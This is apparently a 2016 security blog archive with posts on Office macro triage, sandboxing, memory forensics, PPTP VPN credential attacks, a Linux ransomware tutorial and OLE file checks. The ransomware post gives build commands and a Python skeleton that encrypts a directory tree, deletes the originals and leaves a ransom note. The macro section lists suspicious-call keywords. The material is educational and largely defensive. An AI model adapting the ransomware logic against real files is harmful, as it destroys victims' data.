Saturday, November 12, 2016

Analyze Macro Code from Malicious Documents

Microsoft Office is something almost everybody uses and knows about; if you are a regular computer user you will, to some extent, be using Microsoft Office or one of its variants. That also makes Office documents a favourite carrier for malware, so in this post we want to show you how a malicious document can be analyzed in order to find the macro code hidden inside it. So let's start.

Malicious Samples


Macro code is usually written in VBA (Visual Basic for Applications); for more on the language see the Wikipedia article. Here I have some malicious sample files, which you can get by asking me in the comments. They contain macro code that basically just pings localhost and opens notepad.exe on a Windows host, so they are harmless to play with, but the document still prompts the user to enable macros the way a real malicious one does.
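Once the macro source has been pulled out of the file (olevba or oledump.py will do that), the next step is to read it for the entry point and the command it runs. The following is an added triage helper for this post, not code from the original page or from the samples; the macro text it scans is constructed here to mirror the description above (ping localhost, then start notepad.exe), with the command hidden behind Chr() calls the way real samples often do it, and the keyword lists are my own choice.

```python
"""Quick triage of VBA macro source extracted from an Office document.

Added example for this post, not code from the original page. It assumes
the macro text has already been pulled out of the file and looks for three
things: auto-execution entry points, suspicious calls, and Chr()-style
string building that hides the real command from a plain grep.
"""
import re

# Constructed sample (not the post's file): the command string is assembled
# from Chr() calls so that searching the raw text for "notepad" finds nothing.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim cmd As String
    cmd = "cmd /c ping 127.0.0.1 && " & Chr(110) & Chr(111) & Chr(116) _
        & Chr(101) & Chr(112) & Chr(97) & Chr(100) & ".exe"
    Shell cmd, vbHide
End Sub
'''

# Names that make a macro run without the user clicking anything.
AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open", "Auto_Close",
            "Document_Open", "Document_Close", "Workbook_Open")
# Calls worth a second look (list is an assumption, extend it as needed).
SUSPICIOUS = ("Shell", "WScript.Shell", "CreateObject", "powershell", "cmd /c",
              "URLDownloadToFile", "XMLHTTP", "Environ", "vbHide")

CHR_RUN = re.compile(r'Chr\(\s*\d+\s*\)(?:\s*&\s*Chr\(\s*\d+\s*\))*')
CHR_ONE = re.compile(r'Chr\(\s*(\d+)\s*\)')


def normalize(vba: str) -> str:
    """Join VBA line continuations (" _" at end of line) into single lines."""
    return re.sub(r'[ \t]_\r?\n[ \t]*', ' ', vba)


def deobfuscate_chr(vba: str) -> str:
    """Turn every Chr(110) & Chr(111) ... run into a literal, then glue
    adjacent literals ("a" & "b" -> "ab") so the whole command is visible."""
    def run_to_literal(m):
        return '"' + ''.join(chr(int(c)) for c in CHR_ONE.findall(m.group(0))) + '"'
    text = CHR_RUN.sub(run_to_literal, vba)
    return re.sub(r'"\s*&\s*"', '', text)


def triage(vba: str) -> dict:
    """Return entry points, suspicious calls, recovered strings and a rough score."""
    clean = deobfuscate_chr(normalize(vba))
    autoexec = [k for k in AUTOEXEC
                if re.search(r'\b' + re.escape(k) + r'\b', clean, re.I)]
    suspicious = [k for k in SUSPICIOUS if k.lower() in clean.lower()]
    strings = re.findall(r'"([^"\n]{4,})"', clean)
    return {
        "autoexec": autoexec,
        "suspicious": suspicious,
        "strings": strings,
        "score": 2 * len(autoexec) + len(suspicious),
        "deobfuscated": clean,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    print("entry points :", report["autoexec"])
    print("suspicious   :", report["suspicious"])
    print("strings      :", report["strings"])
    print("score        :", report["score"])
```

The deobfuscated string is the thing to pivot on: the same command line is what you would expect to see in a sandbox run or a process-creation log, so a document whose recovered strings contain `cmd /c` or `powershell` next to a `Document_Open` handler does not need to be detonated to be classified.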


[Image: the VBA macro source, and the document prompting the user to enable macros]


Friday, November 11, 2016

cuckoo sandbox Automated Malware Analysis

Cuckoo is a very well-known automated malware analysis sandbox, and with it you can build your own poor man's malware analysis lab. So let's see how we achieve that; stay with me.

Installation & First Run


As the focus here is not installation, I won't make you suffer through the huge installation article; if you want to install it yourself you are good to go with the default installation guide at the official URL, and if you feel lost, ping me and I'll help you set it up as much as I can. So I assume you have already installed Cuckoo. Let's first run the Cuckoo sandbox, and VirtualBox as well, so that Cuckoo can find our Windows XP guest. Keep that guest on an isolated (host-only) network, so that whatever you detonate in it cannot reach the rest of your network.

[Image: the Cuckoo sandbox (cuckoo.py) started with the VirtualBox guest running]

Thursday, November 10, 2016

Digital Forensics Investigation with Autopsy

Autopsy is a digital forensic investigation tool used by law enforcement, military personnel and corporate examiners to work out what was done on a target system, flash drive or specific set of files. So let's dig into it.

Get Autopsy


First of all we need to get Autopsy from this URL and install it. Upon successful installation you should be greeted with the following screen. One habit to build from the start: point Autopsy at a forensic image (a write-blocked or read-only copy) rather than at the original drive, so the evidence is never modified by the examination itself.


[Image: Autopsy first-run screen]

Wednesday, November 9, 2016

Dumping Plain text Chat From Memory - Forensic

We've already posted a way to capture RAM with DumpIt; in this post we're going to show you how to dump clear-text chat messages from that memory image. So let's do it.

Capturing Data


Before capturing data we'll quickly use our browser to send some messages, so let's do it. I'm using the Google Hangouts messenger. Send them right before you capture: the aim is to have the message text still sitting in the browser's memory when the dump is taken.
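Once the dump is on disk, the search itself is a strings extraction with a filter, with one catch: browsers keep page text in both 8-bit and UTF-16 buffers, so a plain `strings` run over the .raw file misses the UTF-16 half. The following is an added example for this post, not the original author's procedure or tooling; the memory image it scans is constructed in-line (non-printable filler with a few planted messages), and on a real DumpIt capture you would call `scan_file()` on the .raw file instead. The chat heuristic is an assumption of mine, not anything Hangouts-specific.

```python
"""Scan a raw memory image for printable strings in ASCII and UTF-16LE and
keep the ones that read like chat text.

Added example, not the post's own procedure. The "dump" is constructed here;
scan_file() is what you would run on a real capture.
"""
import os
import re
import tempfile

MIN_LEN = 8
ASCII_RUN = re.compile(rb'[\x20-\x7e]{%d,}' % MIN_LEN)
UTF16_RUN = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % MIN_LEN)

# Constructed filler: bytes that are never printable in either encoding.
FILLER = bytes([0x00, 0x01, 0xff, 0x80]) * 64


def build_sample_dump() -> bytes:
    """Constructed stand-in for a memory dump (not a real capture)."""
    return (FILLER
            + b"hey are you coming to the meeting at 5?" + FILLER
            + "sure, bring the usb drive with the report".encode("utf-16-le") + FILLER
            + b"GET /v1/messages HTTP/1.1" + FILLER)


def extract_strings(data: bytes, base: int = 0) -> list:
    """All ASCII and UTF-16LE runs in data, with absolute offsets, sorted."""
    found = []
    for m in ASCII_RUN.finditer(data):
        found.append({"offset": base + m.start(), "size": len(m.group(0)),
                      "encoding": "ascii", "text": m.group(0).decode("ascii")})
    for m in UTF16_RUN.finditer(data):
        found.append({"offset": base + m.start(), "size": len(m.group(0)),
                      "encoding": "utf-16le", "text": m.group(0).decode("utf-16-le")})
    return sorted(found, key=lambda s: s["offset"])


def looks_like_chat(text: str) -> bool:
    """Heuristic (assumption): several words, mostly letters and spaces.
    URLs, paths and hex blobs fail this; conversational text passes."""
    if len(text.split()) < 3:
        return False
    plain = sum(c.isalpha() or c == " " for c in text)
    return plain / len(text) >= 0.8


def chat_candidates(strings: list) -> list:
    return [s for s in strings if looks_like_chat(s["text"])]


def scan_file(path: str, chunk: int = 4 * 1024 * 1024) -> list:
    """Stream a large dump through extract_strings() chunk by chunk. A run that
    reaches the end of a chunk is held back and re-scanned with the next one,
    so strings straddling a boundary come out whole and are reported once."""
    results, base, carry = [], 0, b""
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            eof = not block
            buf = carry + block
            matches = extract_strings(buf, base)
            deferred = [s for s in matches
                        if not eof and s["offset"] - base + s["size"] >= len(buf) - 1]
            emitted = [s for s in matches if s not in deferred]
            results.extend(emitted)
            if eof:
                return results
            if deferred:
                cut = min(s["offset"] - base for s in deferred)
            else:   # keep a short tail: a run shorter than MIN_LEN may continue
                last_end = max((s["offset"] - base + s["size"] for s in emitted), default=0)
                cut = max(last_end, len(buf) - 2 * MIN_LEN)
            carry, base = buf[cut:], base + cut


def demo_file_roundtrip(chunk: int = 100) -> list:
    """Write the constructed dump to a temp file and scan it in small chunks,
    which exercises the chunk-boundary handling in scan_file()."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, build_sample_dump())
        os.close(fd)
        return scan_file(path, chunk=chunk)
    finally:
        os.remove(path)


if __name__ == "__main__":
    for s in chat_candidates(extract_strings(build_sample_dump())):
        print(f"{s['offset']:#010x} {s['encoding']:8} {s['text']}")
```

On a real dump, pass the result of `scan_file()` through `chat_candidates()` and then grep for a word you know you typed; the offset tells you where in the image the text lives, which is useful if you later want to map it back to a process with Volatility.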


[Image: Hangouts messages sent from the browser before the capture]

Tuesday, November 8, 2016

Hacking Any PPTP Vpn in 3 Minutes

PPTP VPN stands for Point-to-Point Tunneling Protocol virtual private network, which you connect to in order to become part of a remote network. There are many benefits for an attacker who manages to obtain the credentials of such a VPN connection, and PPTP makes that easier than it should be: its authentication (MS-CHAPv2) can be attacked offline once the handshake has been captured, which is why this works against any PPTP server. So here is the demo of how we'll do it.

Setup


We need an attacker machine and a victim machine against which we'll perform the attack. I am using Windows 7 (victim) and BackTrack (attacker) for the purpose; below are the IPs of the machines and the VPN connection settings.

[Image: the VPN connection settings and the Windows machine's IP configuration]

Monday, November 7, 2016

Linux Ransomware Tutorial - How to Do it

This post is strictly for educational purposes; we are not responsible for any action or reaction.

We already know that the world is being annoyed and blackmailed by ransomware these days at the hands of cyber criminals, so here is a quick how-to on ransomware for those who don't know what it is and how it works.

Get Your Arsenal


For the demo we are going to use a public project that is available on GitHub at this URL.
Just get encrypt.c & decrypt.c, then compile them with the commands below (you need the OpenSSL development package installed, since both programs link against libssl and libcrypto):
gcc -o encrypter encrypt.c -lssl -lcrypto
gcc -o decrypter decrypt.c -lssl -lcrypto
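To see the mechanics behind those two programs without needing OpenSSL, here is an added Python sketch of the same workflow; it is not the GitHub project's code. The cipher in it is a stand-in (a SHA-256 keystream XOR with an HMAC tag, rather than the AES the C code would use through OpenSSL), the header marker, file suffix and note name are made up for the example, and it only ever touches a temporary directory that it creates and removes itself. The structure is the part worth reading: walk the tree, derive a per-file key from one master key, write a header the decrypter can parse, rename the file, drop the note, and reject the wrong key on the way back.

```python
"""Skeleton of what an encrypt.c / decrypt.c pair does, in plain Python.

Added example for this post, not the GitHub project's code. Stand-in cipher,
made-up header layout, and it works only inside a temp directory it creates.
"""
import hashlib
import hmac
import pathlib
import secrets
import tempfile

MAGIC = b"LOCKED01"               # hypothetical header marker
SUFFIX = ".locked"                # hypothetical suffix for locked files
NOTE_NAME = "README_DECRYPT.txt"  # hypothetical note name


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR data with SHA-256(key || nonce || counter) blocks (stand-in for AES-CTR)."""
    out = bytearray()
    for counter in range((len(data) + 31) // 32):
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
    return bytes(a ^ b for a, b in zip(data, out))


def file_key(master: bytes, nonce: bytes) -> bytes:
    """One master key, a fresh key per file: losing one file key reveals nothing else."""
    return hashlib.sha256(b"file-key" + master + nonce).digest()


def encrypt_file(path: pathlib.Path, master: bytes) -> pathlib.Path:
    nonce = secrets.token_bytes(16)
    key = file_key(master, nonce)
    ct = keystream_xor(key, nonce, path.read_bytes())
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    locked = path.with_name(path.name + SUFFIX)
    locked.write_bytes(MAGIC + nonce + tag + ct)   # header: magic | nonce | tag | ciphertext
    path.unlink()                                  # only the .locked copy remains
    return locked


def decrypt_file(locked: pathlib.Path, master: bytes) -> pathlib.Path:
    blob = locked.read_bytes()
    if not blob.startswith(MAGIC):
        raise ValueError(f"{locked}: not a locked file")
    nonce, tag, ct = blob[8:24], blob[24:40], blob[40:]
    key = file_key(master, nonce)
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError(f"{locked}: wrong key or corrupted file")
    original = locked.with_name(locked.name[:-len(SUFFIX)])
    original.write_bytes(keystream_xor(key, nonce, ct))
    locked.unlink()
    return original


def encrypt_tree(root: pathlib.Path, master: bytes) -> int:
    count = 0
    for p in sorted(root.rglob("*")):           # listing is materialised before renaming
        if p.is_file() and not p.name.endswith(SUFFIX) and p.name != NOTE_NAME:
            encrypt_file(p, master)
            count += 1
    (root / NOTE_NAME).write_text("Your files are encrypted. (demo note)\n")
    return count


def decrypt_tree(root: pathlib.Path, master: bytes) -> int:
    count = 0
    for p in sorted(root.rglob("*" + SUFFIX)):
        decrypt_file(p, master)
        count += 1
    note = root / NOTE_NAME
    if note.exists():
        note.unlink()
    return count


def demo() -> dict:
    """Create a scratch tree, lock it, check a wrong key is rejected, unlock it."""
    master = secrets.token_bytes(32)
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        (root / "sub").mkdir()
        files = {root / "notes.txt": b"quarterly numbers\n",
                 root / "sub" / "photo.bin": bytes(range(256)) * 5}
        for p, content in files.items():
            p.write_bytes(content)
        locked = encrypt_tree(root, master)
        after_lock = sorted(q.name for q in root.rglob("*") if q.is_file())
        wrong_key_rejected = False
        try:
            decrypt_file(root / "notes.txt.locked", secrets.token_bytes(32))
        except ValueError:
            wrong_key_rejected = True
        unlocked = decrypt_tree(root, master)
        restored = all(p.read_bytes() == c for p, c in files.items())
    return {"locked": locked, "unlocked": unlocked, "restored": restored,
            "wrong_key_rejected": wrong_key_rejected, "after_lock": after_lock}


if __name__ == "__main__":
    print(demo())
```

Two details carry over to reading real samples: the per-file nonce in the header is what lets one master key cover every file, and the tag is what stops a victim (or an analyst) from telling whether a guessed key is right by looking at the plaintext alone. In real ransomware the master key is in turn protected with the attacker's public key; that layer is left out here.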

[Image: compiling encrypt.c]

Sunday, November 6, 2016

Examine Malicious OLE Files - preventing zero day attacks

Microsoft developed OLE technology to embed documents and other objects inside one another, which attackers also noticed and tried to use for their own benefit; they have abused it in Microsoft Word 2010 documents and in Rich Text (RTF) documents as well. Let's see how to tell a valid DOC file from a malicious one.

Are You Ready?


First create a valid test.doc file; I created one named Test file.doc, i.e. a Microsoft Word document. Now it's time to perform a quick MIME-file analysis on the file,
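Before any tool is pointed at a .doc, it is worth checking what the bytes actually are, because a "Word document" that is really an RTF or a MIME file is a classic delivery trick, and a genuine OLE2 file has a fixed header whose fields can be sanity-checked. The following is an added example for this post, not the tool in the screenshot: a content sniffer plus a parser for the 512-byte OLE2 (Compound File Binary) header, with field offsets taken from the [MS-CFB] layout. The sample bytes are constructed in-line (a minimal well-formed CFB header and an RTF body saved under a .doc name); the extension table is my assumption.

```python
"""Check what an Office file really is, then sanity-check its OLE2 header.

Added example, not the page's tool. Sample data is constructed in-line.
"""
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
HEADER_FMT = "<8s16sHHHHH6s9I109I"          # 512-byte CFB header, little-endian
assert struct.calcsize(HEADER_FMT) == 512
ENDOFCHAIN, FREESECT = 0xFFFFFFFE, 0xFFFFFFFF

# Which container each extension is supposed to be (assumption for the example).
EXPECTED = {".doc": "ole2", ".xls": "ole2", ".ppt": "ole2",
            ".docx": "zip/ooxml", ".xlsx": "zip/ooxml", ".rtf": "rtf"}


def sniff(data: bytes) -> str:
    """Classify by content, never by name."""
    head = data[:1024]
    if head.startswith(CFB_MAGIC):
        return "ole2"
    if head.startswith(b"PK\x03\x04"):
        return "zip/ooxml"
    if head.startswith(b"{\\rt"):          # Word accepts "{\rt", not only "{\rtf"
        return "rtf"
    if b"MIME-Version:" in head or head.startswith(b"From:"):
        return "mime"
    return "unknown"


def parse_cfb_header(data: bytes) -> dict:
    """Decode the CFB header and list every field that is off-spec."""
    fields = struct.unpack(HEADER_FMT, data[:512])
    (sig, _clsid, minor, major, byte_order, sector_shift, mini_shift, _res,
     n_dir, n_fat, first_dir, _tx, mini_cutoff, first_minifat, n_minifat,
     first_difat, n_difat) = fields[:17]
    difat = [x for x in fields[17:] if x != FREESECT]
    anomalies = []
    if sig != CFB_MAGIC:
        anomalies.append("bad signature")
    if byte_order != 0xFFFE:
        anomalies.append(f"byte order {byte_order:#06x} (expected 0xfffe)")
    if major not in (3, 4):
        anomalies.append(f"unknown major version {major}")
    elif sector_shift != {3: 9, 4: 12}[major]:
        anomalies.append(f"sector shift {sector_shift} does not match version {major}")
    if mini_shift != 6:
        anomalies.append(f"mini sector shift {mini_shift} (expected 6)")
    if mini_cutoff != 4096:
        anomalies.append(f"mini stream cutoff {mini_cutoff} (expected 4096)")
    if major == 3 and n_dir != 0:
        anomalies.append("directory sector count must be 0 in version 3")
    if n_fat == 0 or not difat:
        anomalies.append("no FAT sectors referenced")
    return {"major_version": major, "minor_version": minor,
            "sector_size": 1 << sector_shift, "mini_sector_size": 1 << mini_shift,
            "num_dir_sectors": n_dir, "num_fat_sectors": n_fat,
            "first_dir_sector": first_dir, "mini_stream_cutoff": mini_cutoff,
            "first_minifat_sector": first_minifat, "num_minifat_sectors": n_minifat,
            "first_difat_sector": first_difat, "num_difat_sectors": n_difat,
            "difat": difat, "anomalies": anomalies}


def examine(name: str, data: bytes) -> dict:
    """Sniff the container, compare with the extension, parse the header if OLE2."""
    kind, warnings, header = sniff(data), [], None
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext in EXPECTED and EXPECTED[ext] != kind:
        warnings.append(f"{name}: extension says {EXPECTED[ext]} but content is {kind}")
    if kind == "ole2":
        if len(data) < 512:
            warnings.append(f"{name}: truncated OLE2 header")
        else:
            header = parse_cfb_header(data)
            warnings.extend(f"{name}: {a}" for a in header["anomalies"])
    return {"kind": kind, "warnings": warnings, "header": header}


def build_sample_cfb() -> bytes:
    """Constructed minimal version-3 CFB: FAT in sector 0, directory in sector 1."""
    difat = [0] + [FREESECT] * 108
    header = struct.pack(HEADER_FMT, CFB_MAGIC, b"\x00" * 16, 0x3E, 3, 0xFFFE, 9, 6,
                         b"\x00" * 6, 0, 1, 1, 0, 4096, 2, 1, ENDOFCHAIN, 0, *difat)
    return header + b"\x00" * 512                # plus one empty sector


# Constructed RTF body, the kind of thing that gets mailed out as "invoice.doc".
SAMPLE_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}{\\object\\objemb}\\par}"

if __name__ == "__main__":
    for name, data in (("Test file.doc", build_sample_cfb()), ("invoice.doc", SAMPLE_RTF)):
        r = examine(name, data)
        print(name, "->", r["kind"], r["warnings"] or "ok")
```

A valid Word file passes with an empty warning list; the RTF under a .doc name is flagged on the extension mismatch alone, before any parser is run on it. The header check is the cheap first gate: a file that claims OLE2 but has a nonsensical sector shift or no FAT sectors is either corrupt or deliberately malformed to trip up a parser, and either way it deserves a closer look in emldump.py, oledump.py or a sandbox rather than a double-click.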

[Image: OLE file analysis, running emldump.py -d filename on the test document]